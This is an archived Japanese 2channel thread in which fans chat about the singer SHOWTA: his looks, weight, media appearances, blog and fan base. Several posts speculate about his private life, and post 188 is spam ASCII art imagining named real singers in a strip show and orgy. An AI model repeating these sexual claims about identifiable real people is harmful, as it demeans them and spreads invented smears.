SHOWTAの出身校しってる

167 :NO MUSIC NO NAME:2006/12/19(火) 19:16:27 ID:LCcDUj0L
別にそんなんどうでもいいじゃん
くだらない

168 :NO MUSIC NO NAME:2006/12/19(火) 21:02:31 ID:pIFMhlJh
まぁどうでもいいわな…あいつがどんな人間でも最近人気でてきたみたいだし。ファンの奴らもあいつが性なんとかでも引かないとおもうわ。

169 :NO MUSIC NO NAME:2006/12/19(火) 21:06:44 ID:pIFMhlJh
まぁどうでもいいわな…あいつがどんな人間でも最近人気でてきたみたいだし。ファンの奴らもあいつが性なんとかでも多分ひかんやろな

170 :NO MUSIC NO NAME:2006/12/25(月) 12:58:19 ID:dFlsEc55
んだんだ

171 :NO MUSIC NO NAME:2006/12/26(火) 16:24:05 ID:88LSZ3IC
(*´ω`*)

172 :NO MUSIC NO NAME:2006/12/26(火) 16:37:31 ID:3LLVGjSj
眉細すぎ

173 :NO MUSIC NO NAME:2006/12/27(水) 10:11:17 ID:kLEHO7Qj
すげー細いよね。笑

174 :NO MUSIC NO NAME:2006/12/27(水) 13:49:13 ID:bqsDBQtn
公式サイトでかかってる曲は何?

175 :NO MUSIC NO NAME:2006/12/27(水) 22:52:00 ID:AP1bR7Z1
この前生で見たとき太って見えたんだけど着膨れしてるだけなのか?
それとも実際やや太り気味?

176 :NO MUSIC NO NAME:2006/12/28(木) 00:31:09 ID:gYw4lEoF
ちょっと前に太り気味とかブログで書いてたような

177 :NO MUSIC NO NAME:2006/12/28(木) 13:15:22 ID:bh2Grux9
>>176
ありがとう
痩せればかっこよくなりそうなのに太ってるなんてもったいない

178 :NO MUSIC NO NAME:2006/12/31(日) 00:07:53 ID:ZzHMfLLT
やなしょうってあだ名がついてて、中学生のとき下の学年からも人気ありました。本人は気づいてないと思うけど…

179 :NO MUSIC NO NAME:2006/12/31(日) 00:55:40 ID:eBS/PCP2
今、ラジオで2ちゃんって言ったな

180 :NO MUSIC NO NAME:2006/12/31(日) 04:47:06 ID:HybAx8lU
2ちゃん用語使うみたいな事を言ってたよね。
おーいSHOWTA.くん、見てる? 来年も応援するYo♪


181 :NO MUSIC NO NAME:2006/12/31(日) 04:51:54 ID:8pc6rKZm
がんばってね〜☆

182 :NO MUSIC NO NAME:2006/12/31(日) 04:59:48 ID:HybAx8lU
TBC(東北放送)の「J's Room」の写真、腕組んでるのかな?
あの右手はどっちの手なのか気になるなー

183 :NO MUSIC NO NAME:2006/12/31(日) 23:58:18 ID:jL4AVW4C
HEY×3で番組観覧募集してるけど
好きなアーティスト明記のとこSHOWTA.って書けば
SHOWTA.くんも出演する確率UPするかな?
来年はいっぱいテレビで見たい。

SHOWTA.くん2006年楽しかったよ、ありがとう〜☆

184 :NO MUSIC NO NAME:2007/01/01(月) 19:31:25 ID:3wXOGXWl
7日にふくしまFMで12月のイベントの放送あるみたい。
でも聞けないよ・・・ヽ(`Д´)ノウワァァン!!

185 :NO MUSIC NO NAME:2007/01/02(火) 14:46:34 ID:RpIBo9Az
2ちゃん用語使うのか・・・ なら間違いなくここ見てるよねw

186 :NO MUSIC NO NAME:2007/01/02(火) 20:34:32 ID:X9lKGpCT
まぎれてカキコしてたらワロスw

187 :NO MUSIC NO NAME:2007/01/02(火) 20:57:57 ID:YqP/AR0I
童貞なんかな?

188 :NO MUSIC NO NAME:2007/01/02(火) 20:59:02 ID:6nHLiJFZ
明けましておめでとう。今年は受信料もらいません。NHK。安倍総理。                              
   ,r‐-、      トイ ^ o^ t;|    /    `、
  /  、 \     >‐-ュr'ニヽ、  /  i   l、
  |   '|  \ _.r'´ノニーイニヽ,\/    |   l
  |    |   `</ lo )  ⌒q! /    .|   |
  .|    |    \/'    _,  |/     ト、  !
  |   |      \ ⌒,,,⌒ /       ハ   ヽ
  .|   .|ヘ       \ 巛《 /       l )   \
   |   .| ヽ       彡゚д゚ミ       ,' ノ     \
  ノ   ヽ ヽ       ミ《》彡     .ノ ゝ、__
/     ヽヘ、       ミ*ミ    /      `⌒
     _ノ  `ー 、. _   ,X、._,.-‐'´
 開毛増してオメ出とう  職員の懲戒処分まだ〜。
来年は紅白ありません。変わりにストリップショー
赤白、イレポン、出しポン、<本番大会>大会やります。

最初は、モーニング娘=スマップ。丸出しストリップショー。
aiko。浜崎。平原。大塚。絢香。=TOKIO。ポルノ。コブクロ。らの乱交ショー。

後半は、マンネリ演歌歌手の本番1本勝負(立たない歌手は誰か興味ある。)
北島三郎=和田アキ子。 鳥羽一郎=天童よしみ。 氷川きよし=水森かおり。
美川憲一=小林幸子。  五木ひろし=石川さゆり。森進一=森昌子。

視聴率、99,9%間違いない。他のテレビ局はお休みいたします。


189 :NO MUSIC NO NAME:2007/01/03(水) 01:37:38 ID:dpf2G+zy
TRANS-WINTERだっけ?音楽交差点でPV見た!
母が「え?男の子?女の子の声だなあ…」って驚いてた

BoAみたいだな うん

190 :NO MUSIC NO NAME:2007/01/03(水) 07:14:56 ID:tGHaC70l
うん

191 :NO MUSIC NO NAME:2007/01/03(水) 16:41:27 ID:H98B667a
頑張ってMステ出たいらしい

192 :NO MUSIC NO NAME:2007/01/03(水) 17:27:06 ID:HYDHrBxN
ブログが更新されないけど普段は事務所のパソコンから書いてるのかな?

193 :NO MUSIC NO NAME:2007/01/07(日) 22:20:21 ID:kAZ2PuU2
めんどくさいんじゃね?

194 :NO MUSIC NO NAME:2007/01/08(月) 18:12:43 ID:TlBUAa3a
実は、>>188 がSHOWTA.
あの顔で、実は無類の女好きww
なぜか?
好きな幸田は入れてないwwww

でも、ホルモンバランスは女性ホルモンかなりあるな。

あと、ファンの7割、男じゃねwww

195 :NO MUSIC NO NAME:2007/01/08(月) 22:41:50 ID:oRANJbcm
倖田ね

196 :NO MUSIC NO NAME:2007/01/09(火) 10:23:10 ID:bOw6P1JG
音楽戦士で初めて見たけど、すごい綺麗な声だね。
ブログとか見ると、なんかすごく素直な人なんだろうなと思う。変に擦れてなくて。
私はこの人SOPHIAの松岡さんに似てるなーと思った。

197 :NO MUSIC NO NAME:2007/01/10(水) 00:25:59 ID:u/1ktTql
テニス強いよ

198 :NO MUSIC NO NAME:2007/01/11(木) 19:31:30 ID:kz0asX04
ファンは女の子の方が多くない?

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)